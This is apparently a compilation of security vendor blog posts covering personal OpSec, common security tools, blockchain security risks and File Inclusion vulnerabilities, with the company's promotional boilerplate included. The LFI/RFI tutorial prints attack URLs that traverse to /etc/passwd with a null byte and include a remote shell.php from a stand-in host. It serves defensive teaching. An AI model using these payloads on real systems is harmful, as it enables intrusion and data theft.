
OpSec or How to Behave When You Care About Your Behaviour

Intro

Alrighty! This one has long been on my to-do list! OpSec! Why, how, when, who… how much and how long… Let’s see! Let’s answer some questions. Whether you’re sleuthing for some OSINT investigation, or your country is blocking you from watching your favorite shows on Netflix, you need to figure out your specific OpSec needs, and behave accordingly.

This one is a particularly interesting topic, as it combines a lot of elements – from purely technical to some psychological/behavioural ones.

Before I go further into the topic, I would emphasize that this is my opinion. You can always argue the technicalities, sure, but the methodology is unique – as it should be – again, in my opinion. (Though in this article I am not discussing that many technical aspects)

This is quite logical, as we all have different needs, and are encapsulated within different contexts. What’s true in my case might not necessarily be true in yours. So, with that in mind one might ask – what’s there to learn, then? And it is a valid question! However, we’re interested in the approach here – which is also unique to each and every one of us.

My goal here is to help you get more involved in taking control of your own privacy and having a healthier, safer online presence – which surely accounts for a large portion of your life in general, as we’re all getting more and more dependent on a myriad of online services.

Now that I’ve made the intro, and safely fenced off the personal aspect involved in this topic – let us proceed.

Basics

At its core, OpSec is just managing risk. In the personal case (the one I’m looking at), the risk comes from whatever you deem worthy of incorporating into your model. Thus, you’d also want a threat model – no need to go overboard here, though. This just means identifying which information you want to protect at all costs (i.e., no leaks) and which information you might be fine with being discovered. I purposefully lead with the first sentence above, as you will probably encounter many definitions – but the bottom line is always that I/O of your personal information. You want to control both the I and the O, but you definitely have to focus on the O – in other words, your model and the way you conduct yourself should be in sync with what you’re trying to achieve. Again, based on the model.

You want to prioritize as well. Best practices are best practices for a reason but will deteriorate rapidly if applied blindly (without context to match). I debated with myself whether to include best practices at the end of this article and opted for it in the end. The argument against it was backed by the second sentence of this paragraph. I am counting on you here!

Traditionally, there are stages when it comes to OpSec (for three-letter agencies and the military it really makes sense), and I will mention them here as well. However, I want to emphasize that I am doing so for contextual and historical reasons, as well as for you to be more informed. In the end, though, you’re not required to draft any complex models based on the ones the military uses. Their threat model is surely different from yours, so their OpSec needs are too. The methodology/approach is what you should focus on. Thus, before taking any action, first take a pause and contemplate it. The future you will be better off – i.e., safer online.

Defining OpSec

Okay! I am now going to reference some definitions so you can see how that compares to what I’ve been trying to convey.

1 – (Published by Range Commanders Council, U.S. Army White Sands Missile Range – full .pdf document found here)

The OPSEC is a process of identifying, analyzing, and controlling critical information indicating friendly actions attendant to military tactics, techniques, and procedures (TTPs), capabilities, operations, and other activities to:

  • Identify actions that can be observed by adversarial intelligence systems.
  • Determine what indicators adversarial intelligence systems might obtain that could be interpreted or combined to derive critical information in time to be useful to adversaries.
  • Select and execute measures that eliminate or reduce to an acceptable level the vulnerabilities of friendly actions to adversary exploitation.

As you can see, this is very applicable for us as well! The TTPs of the well-known APTs are already documented by MITRE (since I am talking about the Cyber domain), and aside from the specific stuff regarding military operations, this definition seems quite solid!

To digress for a bit:

Unless you’re the CEO of a large enterprise that’s targeted by advanced threat actors, you might not need to care that much about those documented TTPs. In an “average guy who wants to prioritize his privacy online” scenario, the ‘TTPs’ are quite different in nature. However, the goal is the same – a script kiddie trying to mess something up for the fun of it might not warrant APT-level controls, yet they can still devastate you. Take it all into account and assess critically. Start with the basics and build from there; don’t go overboard just to get pwned by a newbie hacker who bought a phishing kit on the dark web.

Circling back to the definitions, let’s do one more:

2 – (Published by the Department of the Navy, US Marine Corps – the .pdf can be found here)

OPSEC is a capability that identifies and controls critical information and indicators of friendly force actions attendant to military operations, and incorporates countermeasures to reduce the risk of an adversary exploiting vulnerabilities. When effectively employed, it denies or mitigates an adversary’s ability to compromise or interrupt a mission, operation, or activity. Without a coordinated effort to maintain the essential secrecy of plans and operations, our enemies can forecast, frustrate, or defeat major military operations. Well-executed OPSEC helps to blind our enemies, forcing them to make decisions with insufficient information.

This is it: “…a capability that identifies and controls critical information… and incorporates countermeasures to reduce the risk of an adversary exploiting vulnerabilities…”

As you can see, the proactive nature is what lies at the heart of OpSec: you take into account the things that could compromise you and draft a plan to mitigate them before they occur. There is no reactive OpSec! At that point, you’ve already been pwned, and depending on the criticality of the breach you’re in some (deep) trouble. This also means that one misstep in your (not so) robust model is enough to take it all down. And it makes sense – a hacker just needs to find one way in, and they’re off to the races!

Stages of OpSec – OpSec process

The US Navy document referenced above contains a neat little graphical representation of the OpSec stages.

From 1. to 5. you’d have:

  1. Identification of critical information
  2. Analysis of threats
  3. Analysis of vulnerabilities
  4. Assessing the risk
  5. Applying countermeasures

This is also what you’d get if you Googled for “OpSec stages.”

However, it might be harder for you to analyse threats – as a civilian, you’re not really the target, but you can still end up being a target. Just some more food for thought.

(Also, note that the process is circular)
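The circular five-stage process above can be sketched as a small loop – purely illustrative, with the stage names taken from the process and everything else made up:

```python
# The five OpSec stages as a circular process. The stage names come from
# the Navy document's process; the loop is just an illustration.

STAGES = [
    "Identification of critical information",
    "Analysis of threats",
    "Analysis of vulnerabilities",
    "Assessing the risk",
    "Applying countermeasures",
]

def next_stage(current: int) -> int:
    """The process is circular: after applying countermeasures,
    you start over at identification."""
    return (current + 1) % len(STAGES)

# Walk one full loop and come back to the start.
stage = 0
for _ in range(len(STAGES)):
    print(f"{stage + 1}. {STAGES[stage]}")
    stage = next_stage(stage)

assert stage == 0  # back to identifying critical information
```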

Anonymity vs Privacy

This is the hot stuff right here! VPNs are there for your privacy, not anonymity – anonymity is what Tor is all about. You need to understand this distinction.

The idea is that privacy is you keeping some things for yourself, and this can include your actions. On the flipside, anonymity is supposed to keep your identity private, but not your actions.

This is a very, very, brief overview, but it’s a start. Check out this blog for a bit more information on these two terms. Or this one.

Good (best?) practices

It’s a bit unrewarding to say best practices which is why I purposefully added good to the title. Let’s review some:

  • Don’t talk openly (about your ‘mission’ critical stuff) – Duh!
  • Don’t operate from home – If you intend on doing anything that needs to keep that level of separation from your real persona. If you’re just trying to do normal stuff where that’s a non-issue, then you can adjust accordingly. (I am not trying to help you operate a botnet, also, those guys already know this stuff.)
  • Encrypt everything – this is a great one, though, again, it might not be necessary in your case. You might want to encrypt and safely store only the most critical data. Also, this does require a fair bit of technical knowledge.
  • Create personas – This is the anonymity part. If you really need to do something but it is not a great idea to do it as ‘you,’ create another persona and be them. Great examples of this are sock puppets, or something like the OSINT CTFs I like to participate in.
  • Don’t contaminate – This one ties to the previous one. If you have personas, don’t cross-contaminate them, as in this case they are actually working against you, and you’d be better off just using other controls to protect the real you. It can backfire. Significantly.
  • Don’t trust – I mean… you’re on the Internet after all, adopt a healthy amount of paranoia if you haven’t already.
  • Be paranoid – See the previous one. Even if nobody’s out to get you personally, that doesn’t mean that they’re not out to get you. That’s just the Internet for you.
  • Don’t give people power over you – Just don’t. Don’t overshare, be careful. Anything you say can and will be used against you is very, very, true in this context as well.

Technical good (best?) practices

  • Don’t be the only person using Tor on a network that’s monitored. It’s how they caught this guy.
  • Don’t do stuff on your own infrastructure that might get you in trouble
  • VPN provides privacy! Not anonymity
  • Isolate/segment your environment if there’s a need – I’m thinking VMware, VirtualBox, etc.
  • Check for DNS leaks
  • If your use case calls for it, use Tails, Qubes OS, or Whonix
  • Strong passwords! (And a password manager – I prefer KeePass, as it keeps the stuff locally and you can add more functionality through plugins, such as 2FA)
  • Encrypt your disk, encrypt important stuff – where needed
  • Protect yourself against WebRTC leaks
  • Educate yourself on browser fingerprinting – there’s a lot of stuff online (as well as right here on Vsociety!) There’s this article, too.
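On the strong-passwords point above, Python’s standard library can generate one in a few lines – a minimal sketch, where the length and character set are arbitrary choices (secrets, unlike random, is designed for cryptographic use):

```python
# Generate a strong random password with the stdlib `secrets` module.
import secrets
import string

def generate_password(length: int = 20) -> str:
    # Letters, digits, and punctuation; adjust to whatever a site allows.
    alphabet = string.ascii_letters + string.digits + string.punctuation
    return "".join(secrets.choice(alphabet) for _ in range(length))

print(generate_password())  # store it in your password manager, not your head
```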

Conclusion

I am hoping I’ve piqued your interest with all this OpSec talk. It might seem like overkill to someone who’s maybe coming from a different field, but I assure you it is not! The Internet is a hostile place, and in a hostile environment you’d act accordingly, right? If you’re on vacation in, let’s say, a gorgeous but realistically dangerous place like some cities in Latin America, you would be careful. Do the same when online. Know where you’re treading, and act accordingly.

This is all for now! I hope I’ve made a decent introduction for some of the upcoming articles that will focus on the Darkweb, all the while bringing this fascinating topic closer to you. Stay tuned!

 
Some additional cool stuff to check out

https://www.youtube.com/watch?v=zXmZnU2GdVk

https://www.youtube.com/watch?v=8u7yyFYvzC4

https://www.youtube.com/watch?v=9XaYdCdwiWU

https://www.youtube.com/watch?v=eQ2OZKitRwc


#opsec #privacy #anonymity #best-practices #vicarius_blog

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Security Tools – Pt. 1

Intro

At first glance, the collection of tools that I chose for this article might seem all over the place. However, the idea behind this article is to talk about some of the most important and well-known tools in the Infosec space.

Thus, I talk about Volatility (a DFIR tool) and Metasploit (exploitation and exploit development), as well as Yara (malware research and analysis), MITRE ATT&CK (a threat intel knowledge base), and Sysmon (an advanced logging tool that we can also use to hunt for threats).

Volatility

Volatility is a memory forensics tool developed by the Volatility Foundation. It is a standard tool in virtually every incident responder’s/blue teamer’s toolkit, it can be easily expanded through the many plugins that are available, and, most importantly, it is completely free.

There are many ways to acquire memory captures from a system, and we won’t go into that here. We’ll just mention that the tools differ depending on the system’s state (on/off). For example, for offline systems – specifically Windows – we can work from hiberfil.sys, which is located in %SystemDrive% if the disks are unencrypted.

This file is the compressed image of the previous boot, but that doesn’t mean we can’t do some forensics on it!

Notice I am using the volatility standalone executable (because I am running Windows/CMD in the image); otherwise the command would just be volatility.

imageinfo is the command that suggests the profile we can work with – you need to identify the right one.

Further, we can look for hidden processes with psxview, and use ldrmodules if we need more details – it shows the InLoad, InInit, and InMem columns, and if these are False, that’s quite bad, as it indicates the module has been unlinked or injected. Injected code is obviously very bad, and we can look for it with malfind, and even dump it to a file.
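To make the triage flow above concrete, here is a small helper that builds the Volatility 2 command lines. The plugin names (imageinfo, psxview, ldrmodules, malfind) are real Volatility 2 plugins; the memory image file name and the profile are made-up examples:

```python
# Build Volatility 2 command lines for the usual memory-triage steps.
# Image path and profile below are illustrative placeholders.

def vol_cmd(image, plugin, profile=None):
    """Assemble a `volatility` invocation as a string."""
    parts = ["volatility", "-f", image]
    if profile:
        parts.append(f"--profile={profile}")
    parts.append(plugin)
    return " ".join(parts)

image = "memdump.raw"
print(vol_cmd(image, "imageinfo"))                 # identify a profile first
print(vol_cmd(image, "psxview", "Win7SP1x64"))     # hidden processes
print(vol_cmd(image, "ldrmodules", "Win7SP1x64"))  # unlinked/injected modules
print(vol_cmd(image, "malfind", "Win7SP1x64"))     # injected code
```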

Also, some of the usual hypervisor formats are:

  • .vmem – Vmware
  • .mem – Parallels
  • .sav – VirtualBox

Generally, the most common format is .raw – raw files are collections of unaltered, unprocessed data.

Further, we might want to check what the community says about these processes by uploading the dumps to VirusTotal.

MITRE ATT&CK

MITRE ATT&CK is a global knowledge base that documents adversary TTPs (Tactics, Techniques, and Procedures). MITRE’s mission is to enable better cybersecurity by connecting communities together. The framework, which is used for threat modelling, is free, open, and available to anyone. If your role has anything to do with cybersecurity – from SOC analyst to red team operator or pentester – you should know your MITRE ATT&CK.

ATT&CK® Navigator is a great place to start; there you can see the different matrices, from Enterprise to Mobile and ICS. They all describe how adversaries reach their goals and what specific actions they might take to obtain them. For example, an adversary might deploy rootkits if the goal is to evade your defenses and hide malicious activity.

Yara

Yara, or Yet another ridiculous acronym is a tool used for malware detection and research. You can find much more about Yara here, and here.

A quote from VirusTotal is truly revealing of what kind of importance Yara holds in the Cybersecurity community today:

“The pattern matching swiss knife for malware researchers (and everyone else).”

Yara works by identifying binary as well as text patterns (strings contained in a file, etc.).

To detect those patterns, Yara uses rules, which you can think of as labels we write to determine the maliciousness of a file. Applications use strings to store text data – and such a string can be, for example, a Bitcoin address stored inside some ransomware.

Yara rules are easy to read and understand, and were made to resemble C. We are not going into details as to how you would create your Yara rules, instead, you can check out this awesome article by an Infosec Researcher named fr0gger_, where you can find out more by looking at his Anatomy of a Yara rule infographic.
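To get a feel for the idea without installing anything, here is a dependency-free sketch that mimics what a Yara rule does – named string patterns plus a condition. The rule name, the strings, and the “Bitcoin address” are all made up for illustration; real work should use yara-python and actual Yara syntax:

```python
# A toy, Yara-style rule: named byte patterns plus an 'any'/'all' condition.
# Everything in this rule is invented for illustration.

YARA_LIKE_RULE = {
    "name": "fake_ransom_note",
    "strings": {
        "$btc": b"bc1qexampleaddress",        # hypothetical Bitcoin address
        "$note": b"Your files are encrypted",  # hypothetical ransom text
    },
    "condition": "any",  # like 'any of them' in real Yara syntax
}

def match(rule, data: bytes) -> bool:
    """Return True if the rule's condition holds for the given bytes."""
    hits = [name for name, pattern in rule["strings"].items() if pattern in data]
    if rule["condition"] == "any":
        return bool(hits)
    return len(hits) == len(rule["strings"])  # 'all of them'

sample = b"...Your files are encrypted! Pay to bc1qexampleaddress..."
print(match(YARA_LIKE_RULE, sample))  # True
```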

Also, if you find this tool awesome (as we do!) and decide to follow down the path, be sure not to miss Valhalla – an online Yara rule feed made by Nextron Systems.

Metasploit

Metasploit is the biggest and most well-known exploitation framework. There are two versions: the paid one, Metasploit Pro, has a GUI, while the free version is CLI-based.

The Metasploit framework is basically a bundle of tools that can do scanning, exploitation, post-exploitation, exploit development, and more. Even though it’s mainly geared toward pentesters, it is invaluable for exploit developers.

The main components of Metasploit are modules, msfconsole, and standalone tools. The msfconsole is your CLI interface; modules are there to support your various exploits, payloads, and more; and the standalone tools can help you with exploit development, as well as with pentesting.

Sysinternals

Sysinternals is not a single tool but a collection of 70+ tools, created way back in the ’90s by Mark Russinovich and Bryce Cogswell under Winternals, the software company they co-founded. In 2006, Microsoft acquired the company, and Russinovich started working for Microsoft. Currently, he is the CTO of Microsoft Azure.

The Sysinternals Suite is used by literally everyone – from seasoned IT veterans like sysadmins, to red teamers, and even adversaries! And this is no surprise, since the 70-odd tools that come with the suite cover you on many, many fronts: system information, security utilities, process utilities, networking utilities, and more.

These tools are the real deal, and you should really learn to use them if you’re working in IT – it shouldn’t matter whether you’re a support engineer or a security engineer, Sysinternals is a must. (We will briefly look into one of them below – Sysmon.)

Sysmon

Sysmon is a tool for logging and monitoring events on Windows machines. It is part of the Windows Sysinternals Suite (which is now also available in the Microsoft Store). You can think of Sysmon as the Windows Event Log on steroids – much like Process Explorer, also from the Sysinternals Suite, is the built-in Task Manager on steroids.

Sysmon collects detailed logs and even traces events, which can help with pinpointing abnormalities in your environment. Ideally, you would use Sysmon in conjunction with a SIEM (Security Information and Event Management tool – the best-known example being Splunk), which can further parse the logs and provide even more insight into your systems and any potentially abnormal behavior.

Sysmon requires a config to work, so you can either create one or download one. With the config, you can fine-tune what you would like to log.
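As an illustration, a minimal config that logs only process creations whose image path contains “mimikatz” might look like the fragment below. The schema version must match your Sysmon build, and a real-world config (such as the popular community ones) would be far more thorough:

```xml
<!-- Minimal illustrative Sysmon config: include process-creation events
     whose image path contains "mimikatz". Adjust schemaversion to match
     your Sysmon release. -->
<Sysmon schemaversion="4.90">
  <EventFiltering>
    <ProcessCreate onmatch="include">
      <Image condition="contains">mimikatz</Image>
    </ProcessCreate>
  </EventFiltering>
</Sysmon>
```

You would then install Sysmon with this config via sysmon -accepteula -i sysmonconfig.xml.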

With Sysmon you can filter events to reduce clutter and hunt for threats, malware, persistence, and even evasion techniques. You can also detect Mimikatz – one of the most-used Windows post-exploitation tools, known for dumping credentials from memory – as well as Metasploit, which needs no introduction.

Mimikatz’s signature might be well known, and an antivirus will pick it up, but your adversary can obfuscate the tool, rendering the AV useless. The idea is to use a config that helps us focus on hunting the threat. On MITRE, Mimikatz activity is documented here. Information on hunting Metasploit (and more – PsExec, netstat, net, etc.) can be found here.

These are some extremely powerful features to have, and it goes to show we don’t need to break the bank to protect our systems – there’s a plethora of tools out there with much to offer. Just like Sysmon.

Conclusion

My ideal audience for this article are people newer to the Infosec field, who are naturally curious and hungry for knowledge.

However, I hope that there’s some interesting bits and pieces of info even for some of the more experienced Cybersecurity practitioners – there also might be a link or two above that you find interesting.

Stay tuned for Part 2!

#MITRE #yara #volatility #sysinternals #tooling


Blockchain Security — The New Threat. Part 1.

A new threat is on the horizon.

And this new paradigm promises to be the most profound shift for security professionals since the dot-com boom of the nineties.

I’m talking about blockchains and decentralized economies in the 2020s.

To get a sense for the scope of change in front of us, we need to take a trip down memory lane – to the advent of the internet.

During its infancy, the original internet was designed to be decentralized. With today’s tech giants looming large over every part of the internet, that’s kind of hard to believe. But it’s true. In the early days, the internet had a very practical purpose – to withstand a nuclear blast. Think about it: a network of computers all talking to each other from around the country does not have a single point of failure.

This decentralization turned to centralization as the 1990s went on. While your average internet user could, in theory, create their own webpage, most were bystanders who viewed already-made webpages instead. And while, in theory, you could still create your own email server today, the truth is that it’s a lot easier to just use Gmail. Hence the goalposts moved, ever so gradually, toward centralization.

As the economy recovered from the wreckage of the dot-com boom and bust, the world embraced the internet and the economy huddled around Big Tech companies who successfully carved out their corner of the internet. Such as:

  • Microsoft and its Windows operating system.
  • Google and its search engine.
  • Facebook and its social network.

The rise of these internet startups brought with it a new threat landscape, and online security exploded.

Before Web 2.0 – the web we use today – thousands of users and businesses logged onto the first iteration of the web, wholly unaware of the tenuous security landscape.

Early antivirus software emerged, but its signature-based system produced false positives too often to be reliable.

Malware samples exploded from tens of thousands in the early nineties to more than 5 million by 2007. By the mid-nineties, it had already become clear that cybersecurity was needed on a scale never seen before. This gave rise to heuristic detection to cope with the influx of new threats.

As we move into the next iteration of the web – Web3 – we are on the cusp of another generational expansion — the expansion into cryptocurrencies and the blockchain revolution. And the similarities to the dot-com boom are uncanny.

In each era, you have a new tech with limitless potential that very few folks truly understand. You have thousands of companies popping up hoping to commercialize that new tech with crazy new ideas and a ton of money flowing into the space.

Most of the dot-com startups that sprouted up in the late 1990s were bankrupt by 2003. Yet some of the biggest companies of the internet bubble – companies like Cisco and Intel – have, indeed, gone on to change the world. Cryptocurrencies seem to be on the same trajectory, and they will likely change the landscape over the next two decades… for better or worse.

The Promise of Blockchain and Web3

For the hardcore Web3 proponent, the third coming of the internet is strictly about decentralization.

The internet has come a long way since its inception. We’ve gone from a static, text-based web to a dynamic, multimedia one. But as the web has evolved, so too have the threats that emerge to exploit it.

In the early days of the internet, we used simple text-based interfaces to navigate the web. This was fine for basic information retrieval, but it quickly became clear that this approach was not going to be sufficient for the increasingly complex tasks we wanted to do online.

So, we developed graphical user interfaces (GUIs), making it possible to interact with the web in a more intuitive way. With a GUI, you could point and click your way around the internet, and even manipulate data in a more natural way.

Today, we want to do more than just retrieve information or buy products – we want to be able to interact with others, create and share content, and even earn money online. And we want to do it without compromising our security.

That’s the big promise of Web3 and blockchain.

Web3 is the next evolution of the internet, one that puts users first by giving them control over their own data and identity. With Web3, you can do all the things you’re used to doing online, but without having to give up your privacy or hand over your personal data to Big Tech companies.

Instead of being controlled by a few large corporations, Web3 is powered by the collective effort of its users. And because it’s based on decentralized technologies, Web3 is more resilient to censorship and shutdowns than the current internet.

Allegedly.

To understand Web3, we need to look at blockchain.

Thanks to Bitcoin and Ethereum — two of the world’s stalwart cryptocurrencies – “blockchain” has become a household term.

When Bitcoin first came on the scene, its promise was one of pure decentralization – send money without the need for profit-grabbing middlemen at the banks and keep everyone in check with digital incentives rather than regulations.

This technology has the potential to revolutionize how we create, store, and manage data. As such, with blockchain powering the next iteration of the internet, we’re on the precipice of a new internet that is –in theory – more secure, efficient, and transparent.

Why?

Well, at its core, blockchain is a decentralized ledger. It records transactions without the need for a central authority to update it. This ledger enables innately untrustworthy individuals and entities to collectively create trustworthy systems, without the need for any central authority – hence the term “disintermediation.”

Blockchain enables humans to remove the middlemen from legacy systems and replace them with a collective ledger. By replacing them with an automated and incorruptible technology, we can make today’s systems and processes more trustworthy, faster, and cheaper.
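The “collective ledger” idea can be made concrete with a toy hash chain – a deliberately stripped-down sketch (no consensus, no signatures, no mining) showing why tampering with history is detectable:

```python
# A toy hash chain: each block commits to the previous block's hash, so
# changing any historical entry invalidates every hash after it.
# Real blockchains add consensus, signatures, and much more.
import hashlib
import json

def block_hash(block: dict) -> str:
    """Deterministic SHA-256 over the block's JSON representation."""
    return hashlib.sha256(json.dumps(block, sort_keys=True).encode()).hexdigest()

def add_block(chain: list, data: str) -> None:
    prev = block_hash(chain[-1]) if chain else "0" * 64
    chain.append({"data": data, "prev_hash": prev})

def is_valid(chain: list) -> bool:
    return all(
        chain[i]["prev_hash"] == block_hash(chain[i - 1])
        for i in range(1, len(chain))
    )

chain = []
add_block(chain, "alice pays bob 5")
add_block(chain, "bob pays carol 2")
print(is_valid(chain))                   # True
chain[0]["data"] = "alice pays bob 500"  # tamper with history...
print(is_valid(chain))                   # False - the chain detects it
```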

The applications here are theoretically infinite.

Even Visa, the legacy payments giant, is integrating blockchain technology.

Visa’s executives are betting on decentralized finance and blockchain as the future – and, as such, as a major threat to their payments business. To stay ahead of the curve, Visa’s R&D teams are creating their own blockchain interoperability hub, which promises to connect different blockchain networks into a single channel. This would facilitate the transfer of digital assets between different blockchains.

This isn’t an inconsequential idea. Interoperability in the blockchain world introduces a slew of security challenges, and it is critical to Web3, which aims to apply the main concepts of the blockchain to all aspects of your digital identity and life.

We can’t ignore the security “gaps” within the promise of blockchain decentralization. And these gaps will only become wider as more blockchains are created and interact with one another.

We’ll explore these threats in detail in Part 2.

#vicarius_blog #blockchain


File Inclusion Vulnerabilities (LFI and RFI)

There are two types of File Inclusion Vulnerabilities: Local File Inclusion (LFI) and Remote File Inclusion (RFI).

These inclusion vulnerabilities are very similar to a Directory Traversal attack. I will explain the differences in the section below.

To perform this attack, the attacker needs to target an application with file-saving logic and logic for retrieving files in the UI. The file-saving logic is crucial because it can be the way to reach the target server’s files and then include a script from your machine. In theory, the file-retrieval logic is not crucial for performing the attack; still, it is very important, because the attacker can intercept the request, investigate it, and check which information can help them perform the attack.

We will manipulate the parameter in the URL, as we did before in one of the articles explaining the Directory Traversal attack.

LFI loads local files such as “/etc/passwd,” while RFI, on the flip side, can load files from an external source outside the server.

*Why will you always find examples of these attacks using this plain text file “passwd”?

This file is handy because it contains information such as the list of registered users (user id, group id, home directory, etc.). And it can be accessed because it is world-readable – any local user can read it to map user ids to user names.

Difference between Directory Traversal and File Inclusion Vulnerabilities

In the Directory Traversal article, I gave simple examples of this attack and some prevention tricks you can use with JS, Angular, or C# libraries.

File Inclusion and Directory Traversal look very similar, but they have one huge difference: the possibility of executing files within the attack.

File inclusion vulnerabilities allow you to load and execute a file in the application. A directory traversal attack, on the other hand, is just reading files.

I will give an example later in the text, but here I am just going to explain one scenario so you can better understand:

In the application, we can browse to a file and save it. By investigating the GET request that returns the file, we see that the URL changes, because it contains the name of the file. That means we can manipulate that name and save a file path pointing to a specific target file instead. That file can be .txt, PowerShell (.ps1), etc., and will probably contain a script with malicious code, which is then executed on the target server. That is an example of a Remote File Inclusion attack!

How to test if your application has File Inclusion Vulnerabilities?

It is essential to test the code while developing. In this case, the developer needs to test it himself, not just rely on the tools I mentioned in the Directory Traversal article. It is also important to check whether an attacker can access folders and files, and, even if folders are restricted with permissions, whether those restrictions can be easily bypassed.

Summary:

First step: while preventing this attack, you should find out whether your application allows access to files (i.e., whether it has file inclusion vulnerabilities).

Second step: check whether an attacker can still access the file despite folder/file permissions.

Examples of Local File Inclusion

For example, we have an application with an input field for the file’s name; clicking the Include button uploads the file.

When you successfully upload the file, and you preview it, the URL will change to this:

http://test.com/testController?file=test.php
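
To make the vulnerable logic concrete, here is a minimal Python sketch (the `resolve` function and the web root are my own assumptions, not the application's real code) showing how an unvalidated `file` parameter lets the attacker escape the web root:

```python
import posixpath

BASE_DIR = "/var/www/html"  # assumed web root, for illustration only

def resolve(file_param):
    """VULNERABLE: user input is joined into the path with no validation."""
    return posixpath.normpath(posixpath.join(BASE_DIR, file_param))
```

`resolve("test.php")` gives `/var/www/html/test.php`, but `resolve("../../../etc/passwd")` normalizes to `/etc/passwd`: the attacker has walked out of the web root entirely.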

The attacker starts by exploring how the code is written, to understand the logic used and to find out where the file is saved.

We can start by “making a mistake” when trying to import a file, so that some warning or error occurs. Such warnings or errors usually come back in the response to an HTTP request. Each HTTP request is visible in the browser’s Development Tools, where you can see the headers, the body, the URL that was hit, etc. The body is used when you send a payload, for example the file we are trying to upload.

Then you can easily check the structure of the payload, i.e., what the API expects, so that if you want to replace it with a malicious one, you will know how to make it pass.

*Note: You probably know that the structure of the object you send to the API from the UI needs to match the object the API expects. If it doesn’t, the mapping will not succeed, and you will not even hit the controller in the API.

So, you first want to make a mistake and analyze the returned error/warning message. As you can guess, error and warning messages are where we need to focus.

We should catch all exceptions and replace them with custom, user-friendly messages. With that implemented, the API avoids sending information that would uncover sensitive details: which method is used, what input is expected, the file path, etc.
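
A minimal sketch of this idea in Python (the function name and the message text are hypothetical): log the full details server-side, but return only a generic, user-friendly message to the client:

```python
import logging

logger = logging.getLogger("app")

def read_user_file(path):
    """Return file content, or a generic message that leaks nothing."""
    try:
        with open(path) as f:
            return f.read()
    except OSError as exc:
        # The method used, the real path, and the reason stay in the server log.
        logger.warning("file access failed: %r", exc)
        # The client sees no path, no method name, no stack trace.
        return "The requested file could not be loaded."
```

Calling `read_user_file` on a missing or forbidden path returns only the generic message, so the attacker learns nothing about the application's internals.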

In one of the examples I found on the internet, I saw that even a message like this can be retrieved:

What information does this warning message uncover?

First, this is a PHP application that uses the include method. As W3Schools states: “The include (or require) statement takes all the text/code/markup that exists in the specified file and copies it into the file that uses the include statement.”

Here, the method tries to copy a file with the name “hi,” appending the extension “.php.” The file location is also visible: “/var/www/html”.

So, as you see, this warning uncovers so much information: 

  • the method used, so we know the logic of the application
  • the extension that gets appended, which we will need to bypass
  • the file path, so we know how many “../” we will use, i.e., how we will “walk” through the folders. As you probably already guessed, at this stage we can use the Directory Traversal technique “../”.

What would the attacker use to manipulate the parameter and check out the registered users in /etc/passwd?

http://test.com/testController?file=../../../../etc/passwd%00

%00 – a null byte, used so that all characters after it, including the appended extension, are ignored.
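
On the defensive side, a simple pre-check (my own sketch, not from the original text) can reject these payloads before they ever reach the filesystem; note that it explicitly catches both the null byte and the “../” sequence discussed above:

```python
def is_safe_filename(name):
    """Reject null bytes, traversal sequences, and absolute paths."""
    if "\x00" in name:                    # null-byte truncation trick
        return False
    if ".." in name:                      # directory traversal
        return False
    if name.startswith(("/", "\\")):      # absolute paths
        return False
    return True
```

With this check, `../../../../etc/passwd%00` (decoded to a string ending in a null byte) is rejected, while an ordinary name like `report.txt` passes.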

If this passes successfully and passwd does not have restricted permissions, its content will be readable; if permissions are in place, they are our next focus.

It is great if we didn’t forget to add permissions to files containing sensitive data, but it is also very important to try to bypass those permissions and see how safely we implemented them.

To test that, we could craft test requests with Burp Suite, or use curl or Postman.

We should pay special attention to testing credentials and cookies, because sensitive data can be manipulated there.

In one of the following articles, I will cover best practices for implementing good credential and session management to avoid a problem with broken authentication. 

Examples of Remote File Inclusion

For this type of attack, the saved file name will be a file path pointing to a malicious script on the attacker’s server.

This is an example of a URL that targets a malicious script on the domain.com site:

http://test.com/testController?file=http://domain.com/shell.php

So, this saves the path, and when the path is called, it executes shell.php, a malicious script whose code targets the system to extract data.

*Focus on validating inputs in the UI, so malicious input parameters don’t even reach the API!
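
One common way to do that (a hedged sketch; the file names here are hypothetical) is an allowlist: only explicitly permitted names are accepted, which blocks remote URLs and traversal payloads alike:

```python
ALLOWED_FILES = {"home.php", "about.php", "contact.php"}  # assumed page list

def select_page(file_param):
    """Allowlist check: anything not explicitly permitted is rejected."""
    if file_param not in ALLOWED_FILES:
        return None  # rejects http://domain.com/shell.php and ../ payloads
    return file_param
```

The same check should also run server-side, since an attacker can always bypass the UI and send requests to the API directly.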

Important reminder for using trusted third-party libraries for validation

If you check the logic in these libraries, you can see how to extend it to cover cases specific to your application.

Modification can be done by creating a wrapper over the library’s class, or even by writing a script with the extended logic.

Also, always check and upgrade the versions of your third-party libraries!

Conclusion

Prevention is very important to avoid these vulnerabilities, but testing is equally important.

If you are a software developer, you know that being a good developer means having testing skills as well developed as your coding skills.

You should use all available tools to screen for these types of vulnerabilities, but remember that you should trust your own knowledge the most!

Don’t forget to hand the code to testers, because the person who wrote it can easily overlook some cases, mostly because, while trying to write secure code, they may assume the attacker will attack in a certain way.

If you are a developer, the best practice is to always stay familiar with new attack techniques.

In the end, secure code is the cheapest code!

#LFI #RFI #vicarius_blog

Cover photo by Kevin Ku

About Version 2 Digital

Version 2 Digital is one of the most dynamic IT companies in Asia. The company distributes a wide range of IT products across various areas including cyber security, cloud, data protection, end points, infrastructures, system monitoring, storage, networking, business productivity and communication products.

Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, different vertical industries, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About VRX
VRX is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Could Hackers Drive Your Car Off a Bridge?

